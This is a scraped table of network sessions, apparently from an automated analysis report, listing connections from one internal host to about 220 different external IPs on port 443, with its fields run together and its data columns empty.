                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9730192.168.2.1356982171.225.20.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9731192.168.2.1342582143.223.191.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9732192.168.2.134043614.148.97.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9733192.168.2.134814497.163.148.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9734192.168.2.1350530134.42.35.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9735192.168.2.1334818158.66.153.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9736192.168.2.1343144173.25.247.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9737192.168.2.134924868.164.160.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9738192.168.2.1344236167.79.150.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9739192.168.2.1358372161.106.224.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9740192.168.2.134019499.104.56.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9741192.168.2.135349440.28.1.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9742192.168.2.133289448.100.120.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9743192.168.2.1334426131.170.66.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9744192.168.2.1340416189.75.108.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9745192.168.2.13423024.233.10.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9746192.168.2.1357992186.93.104.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9747192.168.2.1350752188.17.199.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9748192.168.2.1354358203.135.59.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9749192.168.2.1339972146.39.209.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9750192.168.2.135953627.81.150.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9751192.168.2.1333230177.99.154.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9752192.168.2.134986470.242.93.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9753192.168.2.1345792100.248.248.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9754192.168.2.133849894.45.97.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9755192.168.2.1333192123.101.172.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9756192.168.2.135059842.184.132.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9757192.168.2.1342080205.47.58.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9758192.168.2.134508691.63.139.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9759192.168.2.1348222128.227.68.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9760192.168.2.134599239.102.89.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9761192.168.2.133278481.28.71.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9762192.168.2.1338114144.75.138.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9763192.168.2.13385788.83.175.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9764192.168.2.1343898188.162.153.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9765192.168.2.1346538168.172.171.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9766192.168.2.135815267.14.169.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9767192.168.2.1350652221.222.66.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9768192.168.2.1351284121.182.151.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9769192.168.2.13475804.152.219.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9770192.168.2.134104246.145.23.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9771192.168.2.1355016185.189.205.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9772192.168.2.1351524126.122.73.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9773192.168.2.1357168211.78.12.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9774192.168.2.133576473.207.238.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9775192.168.2.1348984113.200.41.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9776192.168.2.136057878.142.204.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9777192.168.2.1343456177.162.119.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9778192.168.2.1336092192.99.200.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9779192.168.2.133344224.147.252.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9780192.168.2.1342080168.37.23.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9781192.168.2.1334920163.7.199.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9782192.168.2.135297473.109.170.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9783192.168.2.1356432151.26.56.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9784192.168.2.1347546204.203.129.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9785192.168.2.133565297.22.102.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9786192.168.2.134118049.134.7.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9787192.168.2.135205463.247.250.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9788192.168.2.1348252180.169.171.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9789192.168.2.133874034.55.78.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9790192.168.2.133567238.155.102.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9791192.168.2.133591845.166.34.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9792192.168.2.1359360171.114.161.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9793192.168.2.133656432.96.248.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9794192.168.2.134296237.197.178.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9795192.168.2.1337032190.240.146.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9796192.168.2.1338366185.227.229.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9797192.168.2.1343590196.53.245.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9798192.168.2.1335286182.73.254.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9799192.168.2.135793453.134.25.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9800192.168.2.134424848.123.213.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9801192.168.2.1342740143.46.176.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9802192.168.2.1348764174.199.10.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9803192.168.2.134637661.129.39.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9804192.168.2.1338700164.94.190.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9805192.168.2.13501665.0.144.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9806192.168.2.1360214201.97.102.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9807192.168.2.135859414.149.181.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9808192.168.2.1357196153.61.190.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9809192.168.2.1349268150.22.141.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9810192.168.2.134172275.122.129.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9811192.168.2.135072096.24.66.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9812192.168.2.1333542164.141.211.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9813192.168.2.1336312125.11.11.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9814192.168.2.1353256121.202.97.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9815192.168.2.134182499.128.236.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9816192.168.2.1334188133.91.158.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9817192.168.2.134742098.168.89.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9818192.168.2.1358788218.216.229.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9819192.168.2.1347746209.171.99.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9820192.168.2.1344350107.148.228.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9821192.168.2.1345392119.21.46.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9822192.168.2.13471521.160.9.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9823192.168.2.1344616121.190.38.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9824192.168.2.133663252.27.172.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9825192.168.2.1333622179.153.47.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9826192.168.2.1335456162.86.4.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9827192.168.2.134088475.26.78.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9828192.168.2.1347982124.145.25.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9829192.168.2.133858854.121.70.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9830192.168.2.1337034189.195.45.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9831192.168.2.1348878177.231.111.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9832192.168.2.1352382107.207.244.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9833192.168.2.1337292151.175.245.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9834192.168.2.1360014219.159.185.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9835192.168.2.1360942113.159.6.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9836192.168.2.1347256209.217.207.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9837192.168.2.134829819.63.248.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9838192.168.2.135300227.55.29.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9839192.168.2.13533849.130.65.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9840192.168.2.135058235.120.197.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9841192.168.2.134619057.220.170.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9842192.168.2.1358886222.31.207.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9843192.168.2.135276662.190.4.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9844192.168.2.1344320203.247.28.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9845192.168.2.1341382167.68.241.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9846192.168.2.135510470.216.214.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9847192.168.2.1355096195.56.198.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9848192.168.2.133428248.77.83.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9849192.168.2.1345416189.108.39.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9850192.168.2.1340304132.246.44.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9851192.168.2.134572489.99.203.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9852192.168.2.134805825.96.196.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9853192.168.2.135879442.252.90.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9854192.168.2.1347692135.68.202.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9855192.168.2.1354910128.143.228.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9856192.168.2.133524485.131.1.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9857192.168.2.134077059.231.241.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9858192.168.2.1355586158.74.129.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9859192.168.2.1338220171.61.79.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9860192.168.2.1358824131.251.49.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9861192.168.2.1356834186.96.160.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9862192.168.2.1340174206.48.84.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9863192.168.2.1345256171.112.248.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9864192.168.2.135876039.74.133.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9865192.168.2.1333920196.177.34.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9866192.168.2.134964036.122.214.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9867192.168.2.1340616185.49.156.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9868192.168.2.1349144156.248.37.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9869192.168.2.1339232121.233.206.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9870192.168.2.135632097.62.247.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9871192.168.2.135327838.129.47.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9872192.168.2.1339136209.28.154.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9873192.168.2.1345690211.142.241.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9874192.168.2.1334324209.234.125.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9875192.168.2.1346768151.223.21.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9876192.168.2.1338756105.250.120.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9877192.168.2.135085234.27.137.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9878192.168.2.1352172157.46.183.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9879192.168.2.135179832.21.155.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9880192.168.2.135694835.188.238.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9881192.168.2.1339724141.1.16.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9882192.168.2.1345670179.53.99.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9883192.168.2.1356038147.43.149.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9884192.168.2.1340390108.191.100.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9885192.168.2.1349990173.157.184.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9886192.168.2.134432849.207.28.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9887192.168.2.1353618103.247.136.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9888192.168.2.1347462180.58.33.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9889192.168.2.134191068.218.249.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9890192.168.2.133428858.89.224.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9891192.168.2.13455844.77.3.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9892192.168.2.1333464122.198.9.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9893192.168.2.1341458157.238.242.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9894192.168.2.1338676142.109.239.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9895192.168.2.1359176172.222.36.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9896192.168.2.1344662205.87.244.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9897192.168.2.134413068.214.86.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9898192.168.2.1345880131.47.191.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9899192.168.2.133481248.100.253.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9900192.168.2.1340082140.0.59.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9901192.168.2.1351152143.39.24.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9902192.168.2.1349684137.64.88.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9903192.168.2.1347376154.221.95.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9904192.168.2.135476294.99.194.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9905192.168.2.133558496.205.189.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9906192.168.2.1355624216.214.180.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9907192.168.2.13393129.84.69.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9908192.168.2.1334568125.53.67.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9909192.168.2.134255046.190.35.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9910192.168.2.1347262213.158.6.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9911192.168.2.1339040205.235.203.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9912192.168.2.134754259.250.14.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9913192.168.2.135753437.64.87.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9914192.168.2.134486024.246.48.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9915192.168.2.1340100186.159.32.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9916192.168.2.1334528156.162.87.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9917192.168.2.1351292162.128.53.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9918192.168.2.135785046.24.63.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9919192.168.2.135394869.84.151.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9920192.168.2.13360305.180.42.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9921192.168.2.1355624164.138.153.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9922192.168.2.1348868109.197.190.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9923192.168.2.134011489.1.204.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9924192.168.2.1339718142.145.86.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9925192.168.2.1334640146.21.186.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9926192.168.2.135659825.182.25.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9927192.168.2.1351030155.76.148.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9928192.168.2.1342056181.17.211.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9929192.168.2.1359634128.43.237.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9930192.168.2.1333254180.175.173.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9931192.168.2.1350236171.67.185.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9932192.168.2.1355762200.233.227.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9933192.168.2.13397625.35.194.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9934192.168.2.136099677.35.129.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9935192.168.2.1339752208.159.15.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9936192.168.2.135796292.34.120.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9937192.168.2.1358670222.115.104.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9938192.168.2.133815658.230.167.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9939192.168.2.1346258141.250.105.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9940192.168.2.1353684185.122.26.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9941192.168.2.135062667.165.3.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9942192.168.2.133811044.129.209.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9943192.168.2.1334470196.238.94.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9944192.168.2.1344738210.195.141.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9945192.168.2.134188498.22.55.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9946192.168.2.1360422177.80.67.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9947192.168.2.1344796210.41.244.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9948192.168.2.136089671.242.172.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9949192.168.2.1358528207.252.135.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9950192.168.2.1337326116.13.188.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9951192.168.2.1346018134.46.54.69443
